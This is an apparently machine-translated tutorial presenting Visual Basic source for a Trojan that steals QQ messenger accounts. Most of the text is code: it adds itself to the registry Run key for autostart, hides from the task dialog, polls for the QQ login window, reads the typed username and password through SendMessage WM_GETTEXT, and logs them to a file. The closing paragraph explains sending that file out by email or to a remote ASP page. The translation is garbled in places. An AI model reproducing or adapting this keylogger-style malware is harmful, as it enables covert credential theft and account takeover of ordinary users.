Principle of QQ account theft Trojan

Qq stealing methods:

1. Exhaustion

The exhaustive method is the simplest and most effective method. this is what we usually call brute-force cracking. however, the disadvantage is that it takes a long time and is slow. In order to avoid brute force usage, Teng Xun launched the second generation of QQ character verification login QQ... so this method is outdated... I will not interpret it too much...

2. Directly read the password file

At present, QQ encryption is getting stronger and stronger. It can take a lot of effort to use this method, and Internet users in Internet cafes have the habit of deleting their QQ directory when they leave, therefore, sometimes this method is powerless.

3. Monitoring Method

It is called a "Trojan" by everyone. It is also the most popular method of account theft on the Internet. The method of getting a password through the window function (applicable to any version of qq) principle and TrojanCodeI will explain in detail. Below is a column written in VB:

Design Concept

We know that the QQ Password box is not specially processed. That is to say, we can use sendmessage to send wm_gettext to get the value in the password box. We can use this to intercept the password, for details, see the following:

Use the timer control to monitor QQ.

Use the window check method (enumwindows) to obtain all the window headers (getwindowtext) and determine whether it is the title of "QQ User Logon, obtain the class name (getclassname) of the subwindow (control on the window) of the QQ logon window, and then get the username and password through ComboBox and edit (get the value by sending wm_gettext via sendmessage ).

Because you cannot determine the occurrence of an external key event, you can only obtain the password value continuously. The specific method is as follows:

First, get the user name value, then keep getting the password value, and then judge whether the window title is the user name. If it is the user name, the last password value is the real password.ProgramComplete.

Programming

(1) first, in order to avoid the program being loaded multiple times, resulting in waste of system resources and unnecessary errors.

Declare variables, processes, and API functions, and write them in the module1.bas file.

declare function createfilemapping lib "Kernel32" alias "createfilemappinga" (byval hfile as long, lpfilemappigattributes as security_attributes, byval flprotect as long, byval dwmaximumsizehigh as long, byval dwmaximumsizelow as long, byval lpname as string) as long 'create a new file ing object private declare function closehandle lib "Kernel32" (byval hobject as long) as long 'close a kernel object type security_attributes nlength as long lpsecuritydescriptor as long binherithandle as long end type const page_readwrite = 1 const error_already_exists = 183 &

Establish a process to determine whether the program is started more often

sub main () dim ynrun as long dim SA as security_attributes SA. binherithandle = 1 SA. lpsecuritydescriptor = 0 SA. nlength = Len (SA) ynrun = createfilemapping (& hffffffff, SA, page_readwrite, 0,128, app. title) 'create a memory ing file If (err. lastdllerror = error_already_exists) then' if the specified memory file already exists, then exit closehandle ynrun 'and close the memory ing file before exiting the Program end if end sub

(2) for real-time monitoring, the program needs to be started automatically when the system is started. Here we use the registry modification method.

Declare variables, processes, and API functions, and write them in the module1.bas file.

Declare function regcreatekey & lib "advapi32.dll" alias "regcreatekeya" (byval hkey &, byval lpszsubkey $, lphkey &) 'create a new item under the specified item. If the specified item already exists, the function opens the existing item.

Declare function regsetvalue lib "advapi32.dll" alias "regsetvaluea" (byval hkey as long, byval lpsubkey as string, byval dwtype as long, byval lpdata as string, byval cbdata as long) as long 'sets the default value of a specified item or subitem

Const HKEY_LOCAL_MACHINE = & h80000002

Const REG_SZ = 1

Establish the process of making the program self-start

Sub Autorun () Dim skeyname as string, skeyvalue as string, skeyvalueicon as string Dim RET as integer, lphkey as long Skeyname = "SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run" 'is the position of the startup item in the registry. You may view it through regedit.exe. Skeyvalue = app. Path & IIF (LEN (App. Path)> 3, "\" & "killoicq.exe", "killoicq.exe") 'monitor.exe for this program Ret = regcreatekey & (HKEY_LOCAL_MACHINE, skeyname, lphkey) 'create a new startup Item Ret = regsetvalue & (lphkey &, "", REG_SZ, skeyvalue, 0 &) 'set the key value End sub

(3) Hide the program itself (me. Hide) and hide it in the close program dialog box.

Declare variables, processes, and API functions, and write them in the module1.bas file.

Declare function registerserviceprocess lib "Kernel32" (byval dwprocessid as long, byval dwtype as long) as long

Const rsp_simple_service = 1' hide

Establishes the process of hiding the program itself in the close program dialog box

Sub hidemywin () Registerserviceprocess lngprocessid, rsp_simple_service End sub

(4) monitor whether OICQ is running

Load a timer control with the interval value of 1 (you can also set it as little as possible). This program uses timer for monitoring.

Private sub timer1_timer () Enumwindows addressof enumproc, 0' all parent windows (top-level and all windows) in the enumerated window list, start monitoring program End sub

Declare variables, processes, functions, and API functions, and write them in the module1.bas file.

Option explicit Declare function enumwindows lib "USER32" (byval lpenumfunc as any, byval lparam as long) As long 'query window Declare function getwindowtext lib "USER32" alias "getwindowtexta" (byval hwnd as long, byval lpstring as string, byval CCH as long) As long 'get the window title Declare function getclassname lib "USER32" alias "getclassnamea" (byval hwnd as long, byval lpclassname as string, byval nmaxcount as long) As long 'gets the class name for the specified window Declare function getwindow lib "USER32" (byval hwnd as long, byval wcmd as long) As long 'get a window handle Const gw_child = 5' find the first child window of the source window Const gw_hwndnext = 2' find the next sibling window for the source window Declare function sendmessage lib "USER32" alias "sendmessagea" (byval hwnd as long, byval _ Wmsg as long, byval wparam as long, lparam as any) As long 'send messages Const wm_gettext = & HD Const wm_gettextlength = & he Dim Buf as string Dim nameall, name, passwordall, password as string Dim I as integer Dim title, titleall, filepath as string Public Function enumproc (byval app_hwnd as long, byval lparam as long) as Boolean 'query the Main Window Dim Buf as string * 1024 Dim length as long Filepath = app. Path & "\ 0.txt" '0.txt is the file for saving the account and password. If Dir (filepath) = "" then Title = "" Titleall = "" End if Length = getwindowtext (app_hwnd, Buf, Len (BUF )) Title = left $ (BUF, length) 'get the title of the window If instr (title, "OICQ User Logon") then' determines whether it is a QQ window Call getziwin (app_hwnd) 'Call (5) to obtain the class name of the account and password box in the OICQ window End if If title <> "" then If instr (titleall, title) then Enumproc = 1 Else Titleall = titleall + title' title indicates the title of the obtained window. Account obtained by if name <> "" then" If instr (title, name) Then SaveFile 'Save the account password (if the obtained title is equal to the obtained account, it indicates that the user name and password have been removed successfully), then call (7) End if End if End if Enumproc = 1 End Function

(5) obtain the class name in the username and password box in the OICQ window.

Customize the sub-window class name function, written in the module1.bas File

We know that the class name of the user name in the OICQ main window is ComboBox, and the class name in the password box is edit. Here we can obtain the class names and their handles to obtain their values.

Public Function getziwin (window_hwnd as long) as string Dim buflen as long Dim child_hwnd as long Dim children () as long Dim num_children as integer Dim I as integer 'Get the class name Buflen = 256 Buf = space $ (buflen-1) Buflen = getclassname (window_hwnd, Buf, buflen) Buf = left $ (BUF, buflen) If right (BUF, 8) = "ComboBox" or right (BUF, 4) = "edit" then' for judgment Getziwin = getwintext (window_hwnd) 'Call (6) to obtain their values Exit Function End if Num_children = 0 Child_hwnd = getwindow (window_hwnd, gw_child) 'gets the handle of the 1st subwindow. Do While child_hwnd <> 0' if a subwindow exists Num_children = num_children + 1 Redim preserve children (1 to num_children) Children (num_children) = child_hwnd Child_hwnd = getwindow (child_hwnd, gw_hwndnext) 'gets the handle of the next sibling window. Loop For I = 1 to num_children Call getziwin (Children (I )) Next I End Function

(6) through (5) the class name in the user name and password box is obtained, and the handle is obtained. This step takes the value

Customize the sub-window value function, written in the module1.bas File

Public Function getwintext (window_hwnd as long) as string 'gets the value of the subwindow. Dim txtlen as long Dim TXT as string 'Send wm_gettext via sendmessage to get the address bar value Getwintext = "" If window_hwnd = 0 Then exit function Txtlen = sendmessage (window_hwnd, wm_gettextlength, 0, 0) If txtlen = 0 Then exit function Txtlen = txtlen + 1 TXT = space $ (txtlen) Txtlen = sendmessage (window_hwnd, wm_gettext, txtlen, byval txt) Getwintext = left $ (txt, txtlen) If Buf = "ComboBox" then Name = getwintext If instr (nameall, name) then I = 0 Else Nameall = nameall + name I = I + 1 End if Else Password = getwintext If instr (passwordall, password) then I = 0 Else Passwordall = passwordall + Password I = I + 1 End if End if End Function

(7) till now, the program has completed the final stage. If (4) the user name and password can be retrieved, the relevant information will be saved.

Customize the information saving process, which is written in the module1.bas File

sub SaveFile () dim file_num as integer dim allstr as string allstr = Name & Space (5) & password & Space (5) & now 'Save account, password, start time file_num = freefile If Dir (filepath) = "" Then open filepath for output as # file_num else open filepath for append as # file_num end if Print # file_num, allstr close # file_num end sub

After using this software, the software will run every time the system starts, monitoring QQ. When you Open QQ and enter the password, the software writes down your QQ account and password in the directory record where the software is located, and saves it in the 0.txt file. You only need to double-click the 0.txt file to view the account and password.

Additional instructions: Since the 0.txt file is saved locally, what should the remote computer do if it wants to know the password of the other party? You can use the email box to send 0.txt files to the specified email address. it can also be accepted through ASP. You can use an FTP space or a website to mount an ASP file, and then use a Trojan to send the account and password to the specified path to save the ASP file.